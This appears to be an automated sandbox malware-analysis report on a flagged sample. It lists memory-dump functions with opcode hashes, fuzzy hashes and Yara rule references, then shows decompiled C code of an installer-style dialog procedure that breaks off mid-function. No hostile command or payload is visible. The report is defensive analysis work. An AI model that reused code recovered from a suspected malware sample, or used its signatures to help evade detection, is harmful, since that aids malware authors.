                                                                                    • Opcode ID: ac3ff82b17e87d95ce4b507e087bf07189b16706f7c482acf999d6596930c094
                                                                                    • Instruction ID: 2f9d277a6001574706d389c334b746f565f4137dcb4d28d4735b50d29d35f784
                                                                                    • Opcode Fuzzy Hash: ac3ff82b17e87d95ce4b507e087bf07189b16706f7c482acf999d6596930c094
                                                                                    • Instruction Fuzzy Hash: BF212832708356DBCF24CF68C9E13E76396BF5E710F4A816A9D4A8BA45E7304845C38A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339213A Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5R1
                                                                                    • API String ID: 0-3876426650
                                                                                    • Opcode ID: be5d66cde3b0c03da08268475e30b45c03e5dce5570944fd301c94ca2974425a
                                                                                    • Instruction ID: cfc70d23b201ddc77e70db316b4048c92b19c3ce9c4565e2ab1eabb06d950d13
                                                                                    • Opcode Fuzzy Hash: be5d66cde3b0c03da08268475e30b45c03e5dce5570944fd301c94ca2974425a
                                                                                    • Instruction Fuzzy Hash: 51217691D0DF0DEEFE64F8789AD07FB628D4B1A1A4F224F174AB3D2CA5E305804A0096
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339E0D5 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: _e$
                                                                                    • API String ID: 0-817774555
                                                                                    • Opcode ID: 12c2edf94dca7b8e3e45a019980d29f105a7c32daffbe60d81e68360485ae46c
                                                                                    • Instruction ID: 80e2fb505368b155baf85d8067dea04a623a0b32a54b22c26e1c79583e4493d1
                                                                                    • Opcode Fuzzy Hash: 12c2edf94dca7b8e3e45a019980d29f105a7c32daffbe60d81e68360485ae46c
                                                                                    • Instruction Fuzzy Hash: E9114230600399DFEB34CF28CED8BDAB3A4BF59751F09805AD8088B264CB749A00DB10
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339E899 Relevance: .2, Instructions: 221COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: d482eba2a764164af572203488b4ee2c6cba17ebe1dfe49335630ebec802ce6a
                                                                                    • Instruction ID: b4831795c97498b45a4ffadfe72aeabdd3888ad9572467a0159d3eadc35839da
                                                                                    • Opcode Fuzzy Hash: d482eba2a764164af572203488b4ee2c6cba17ebe1dfe49335630ebec802ce6a
                                                                                    • Instruction Fuzzy Hash: 6D91CF75A0838ADFEF74CE288D997EA77B6AF54340F05002ECC8E9B644C7359681CB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398515 Relevance: .2, Instructions: 210COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2cafcc2c7a4c0aac4d2243929615f4eb99c9c18fb3515aa9e204a0dc02ac4d2a
                                                                                    • Instruction ID: 9d5a4756e26beaa378064585461da97ae34d7ac23c437a3377c06b3c619c31c1
                                                                                    • Opcode Fuzzy Hash: 2cafcc2c7a4c0aac4d2243929615f4eb99c9c18fb3515aa9e204a0dc02ac4d2a
                                                                                    • Instruction Fuzzy Hash: 9A91EE72608259DFDB39CE28C8807EA77B6FF96354F54816ECC5A8FA15D3308A42CB15
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03396616 Relevance: .2, Instructions: 208COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb97b74267122001ad3c7cf49961d3986df406b79cf605470180c17f8a530612
                                                                                    • Instruction ID: 325465d4692e7625afcfc57ff93fb9d461dd96bc7b7f10eaa494466368d0e778
                                                                                    • Opcode Fuzzy Hash: bb97b74267122001ad3c7cf49961d3986df406b79cf605470180c17f8a530612
                                                                                    • Instruction Fuzzy Hash: B88128B2908348DBDB78CE29CC557EAB7E5FF54310F06851EEC8A97654D7305A81CB42
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398563 Relevance: .2, Instructions: 178COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a157efa67c311967e0ccc7664bb800ab80d50948cddbee9b886897493571b975
                                                                                    • Instruction ID: 1c0f8ba2c073a32ab68196323b5e75faef0089fc4d128d449dc501776fc5b865
                                                                                    • Opcode Fuzzy Hash: a157efa67c311967e0ccc7664bb800ab80d50948cddbee9b886897493571b975
                                                                                    • Instruction Fuzzy Hash: 4081DB72508259DFDB35CF28C8807EA77B1FFA6354F1441AECC5A8EA15E3318A42CB16
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 033966A3 Relevance: .2, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d5084637c692b9ac7615df1cc15d25e3df16039a4a40080b2511738a70cc6b9
                                                                                    • Instruction ID: 1a845027cb1e563f2f74568ff56fd9b053f2b4c8f90aea5afd0736a802beb35a
                                                                                    • Opcode Fuzzy Hash: 4d5084637c692b9ac7615df1cc15d25e3df16039a4a40080b2511738a70cc6b9
                                                                                    • Instruction Fuzzy Hash: 9461F476908758DBDB349E29CC456EAB7B6FF54320F06881EDC89AB214D3305A82CB42
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 033966CB Relevance: .2, Instructions: 155COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f570c1592927ac7b5fd5c4eb07c4c8f0aad4e75dead88856a3bd7f16d7c82855
                                                                                    • Instruction ID: c941cbb375af47c341db8a282cea1ca982db3d074badcc1a48feb5eabdb81d9f
                                                                                    • Opcode Fuzzy Hash: f570c1592927ac7b5fd5c4eb07c4c8f0aad4e75dead88856a3bd7f16d7c82855
                                                                                    • Instruction Fuzzy Hash: 2851F676908758DFDB349E29CC456EAB7F5FF54320F16881EDC89AB214D3305A82CB42
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398626 Relevance: .1, Instructions: 145COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 34bac447e9cd8fdc1a92e7aff98713548752c85defbf00f6d17635e3813f95a4
                                                                                    • Instruction ID: 97748049ed902d9df78dc4c3bef9c5ea8b317262f863da4e56ad0ffa6aad88bb
                                                                                    • Opcode Fuzzy Hash: 34bac447e9cd8fdc1a92e7aff98713548752c85defbf00f6d17635e3813f95a4
                                                                                    • Instruction Fuzzy Hash: 0E512372108359DFDB358F28C8807EA77B5FFA6354F24416ECC998EA15D3314A42CB12
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398ECB Relevance: .1, Instructions: 133COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 15df6dff9839bf58bdad403d2af8f62c6b616863cc8f736eda1fadb2c72a8ff9
                                                                                    • Instruction ID: 13759c1a7eb393bc43fdb1f72b5b6b1b235562b7f5a3fdb2b68d9f76755b2d70
                                                                                    • Opcode Fuzzy Hash: 15df6dff9839bf58bdad403d2af8f62c6b616863cc8f736eda1fadb2c72a8ff9
                                                                                    • Instruction Fuzzy Hash: 5851D031648749CBEFB0CE96DEC57DB72E2AB98341F58822F8D898F608D33496418B55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398EC2 Relevance: .1, Instructions: 123COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 04adf8bb41356d5e1d5e589d94964bba953b658be30916e8cdc266739203dd78
                                                                                    • Instruction ID: cbd1179535e88b4177c009f763404673e8d3b92c7d1adc2ae5f65f8a6d052034
                                                                                    • Opcode Fuzzy Hash: 04adf8bb41356d5e1d5e589d94964bba953b658be30916e8cdc266739203dd78
                                                                                    • Instruction Fuzzy Hash: 6551A031648789DBEFB0CE56DDC57DBB3E2AF98345F58822B8C898F604D33496118B54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03395526 Relevance: .1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 74be563b127c2c23785ec40b660fe98d4ddabc4ec1d13741ab8cdba77dbaf161
                                                                                    • Instruction ID: e1c4763cf68cbfad0dd82ece2dc9bc8eb25eab9a2242f3ec96f7a7e1a0364039
                                                                                    • Opcode Fuzzy Hash: 74be563b127c2c23785ec40b660fe98d4ddabc4ec1d13741ab8cdba77dbaf161
                                                                                    • Instruction Fuzzy Hash: F141CE72A05299DBDF34DF29CC54BDB7AB6EF9A350F46811AAC886B350D3314A418B81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03396812 Relevance: .1, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 54051f44f1d71c512cc7e4f1465efbf30279aae6a650afc39911905c5d03cd5c
                                                                                    • Instruction ID: 8dd0ce93c4cb1974a927c5bd7ad40974ed897deb4b39c1ca9aea9983a5d7940d
                                                                                    • Opcode Fuzzy Hash: 54051f44f1d71c512cc7e4f1465efbf30279aae6a650afc39911905c5d03cd5c
                                                                                    • Instruction Fuzzy Hash: EB4106B2908758DFDF34DE29CC556DAB7B5EF95320F06841EDC89AB214D3705A81CB82
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398A08 Relevance: .1, Instructions: 104COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 422571ef77b024a4af99be78d88aa06ee90cecea3e3c93f0de54a7dba0260b5e
                                                                                    • Instruction ID: 9b5ebbfd8bb7532c51617a77b43169d6e83136e70546cba1b350683e3655e986
                                                                                    • Opcode Fuzzy Hash: 422571ef77b024a4af99be78d88aa06ee90cecea3e3c93f0de54a7dba0260b5e
                                                                                    • Instruction Fuzzy Hash: 534195B6710389CFDB618F28CC88BCA77E5AF59350F86452A9D48DB621D734DA448B04
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398A3A Relevance: .1, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f80a9b0185c6c73124f747b4e2b6e7a051ab00a053eccd9f61f044220cff9cc
                                                                                    • Instruction ID: 728bda1089ce1bb670c519d4e3b06f7536e25f049d178a4dbec28a5f35631848
                                                                                    • Opcode Fuzzy Hash: 9f80a9b0185c6c73124f747b4e2b6e7a051ab00a053eccd9f61f044220cff9cc
                                                                                    • Instruction Fuzzy Hash: 664186B6700389CFDB618F28CD88BCA77E5AF59350F86452A9D48DB625D734DA448B04
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03395810 Relevance: .1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6935cc9fe45912f35e3e16309f3ea6e6d237e5d9e493a238952283bb085b05fd
                                                                                    • Instruction ID: 149c76dde83171b2890ed8a028215063fb83d8edf70492198438fd1eb189b261
                                                                                    • Opcode Fuzzy Hash: 6935cc9fe45912f35e3e16309f3ea6e6d237e5d9e493a238952283bb085b05fd
                                                                                    • Instruction Fuzzy Hash: 7731CE71608345DFEB68AF79C885AEEBBA6EF85310F56051EDC8997221C3304A808B16
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398BD4 Relevance: .1, Instructions: 85COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e8c69b2785efe5752c43d5c23810d7f87e65a5ec1a12a110ed447da0267b7710
                                                                                    • Instruction ID: b0fa8f0f5e2da8a67b6d542d6e924d200a7fb1c3803d4c3c3c576d147b222166
                                                                                    • Opcode Fuzzy Hash: e8c69b2785efe5752c43d5c23810d7f87e65a5ec1a12a110ed447da0267b7710
                                                                                    • Instruction Fuzzy Hash: 26314971201345CFEF25CE2ACA956DABBA6AF96310F58C19ACC4A8F219C7709941CF52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 033968BB Relevance: .1, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5656daa41c0ade23d2dcb93d94229b1b4dbac58511e1b6acb66d8a0baf8c34eb
                                                                                    • Instruction ID: d508785a5d336c565f98d933801b38f88b41db1532d2a15aea429b234d94ff68
                                                                                    • Opcode Fuzzy Hash: 5656daa41c0ade23d2dcb93d94229b1b4dbac58511e1b6acb66d8a0baf8c34eb
                                                                                    • Instruction Fuzzy Hash: C0313472808354EFCF349E298D516DAF7A5AF91320F07890EDCC9A7214D3749A86CB82
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398877 Relevance: .1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a38a3cc90eb8b9c7445bb99cfc40f2032cbf7b32c4b25d043b12f5093ffd61c2
                                                                                    • Instruction ID: 8f70f55e0760bca47b1165bcda1cd9535be9e477a6ee20d2af702fab1ead7639
                                                                                    • Opcode Fuzzy Hash: a38a3cc90eb8b9c7445bb99cfc40f2032cbf7b32c4b25d043b12f5093ffd61c2
                                                                                    • Instruction Fuzzy Hash: 9721F5B6418322DFDB765F34D4412963B71EFA7318B6005AEC4668DE9AE3314547CB02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398B6A Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0b2d417506e8cfe3216435379aaa8795749fa9d96afed033982d23b835ff17fd
                                                                                    • Instruction ID: 43fd602767f638e9e7a431ad0e06ad5b781cb0e150203e29f7c686a0b1f86c76
                                                                                    • Opcode Fuzzy Hash: 0b2d417506e8cfe3216435379aaa8795749fa9d96afed033982d23b835ff17fd
                                                                                    • Instruction Fuzzy Hash: 0211EC32614389DFDB618F28CA887CA7BB5FF4A760F864246DC49EF621CB309A01C704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339EEF9 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8c1ca184c36de9123dc95cf9d929862b4f36cd22a71fe2d259e425f6a9ebff86
                                                                                    • Instruction ID: f2b0f29ea45a9fd710a4aaa7cc8f84baae7024c67b75f1c0233606008c85a0d6
                                                                                    • Opcode Fuzzy Hash: 8c1ca184c36de9123dc95cf9d929862b4f36cd22a71fe2d259e425f6a9ebff86
                                                                                    • Instruction Fuzzy Hash: D41193728043A98BEF389E74CD583DA73A0FF16310F46855E8C4AAB290C7340B85CB45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398D84 Relevance: .0, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 90c8526059a52801250c8de5e650da3223d18a0cb28571320ecadccb7ae40bc1
                                                                                    • Instruction ID: 38ee00fe2b286d998aefff7681b3f303a7bc416ce648e0f49f0aedf845b65c15
                                                                                    • Opcode Fuzzy Hash: 90c8526059a52801250c8de5e650da3223d18a0cb28571320ecadccb7ae40bc1
                                                                                    • Instruction Fuzzy Hash: 4201FC72600385CFDBA28F38CA88BCA73B1FF69790F828256DC489F620D7349A008700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339DAB2 Relevance: .0, Instructions: 7COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8b03c1a70627f4663e27405c1e39dca91a56314090cf4055cccb7619819df8e6
                                                                                    • Instruction ID: e1074c9d936673c554f00baeada028b96728d6d5d67f8a7854f33d58ed02b856
                                                                                    • Opcode Fuzzy Hash: 8b03c1a70627f4663e27405c1e39dca91a56314090cf4055cccb7619819df8e6
                                                                                    • Instruction Fuzzy Hash: E7B09274210641CFCE51CA0CC2A0E9073A4BB18B10BC144C1E892CBB15C264EC42CB04
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 96%
                                                                                    			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
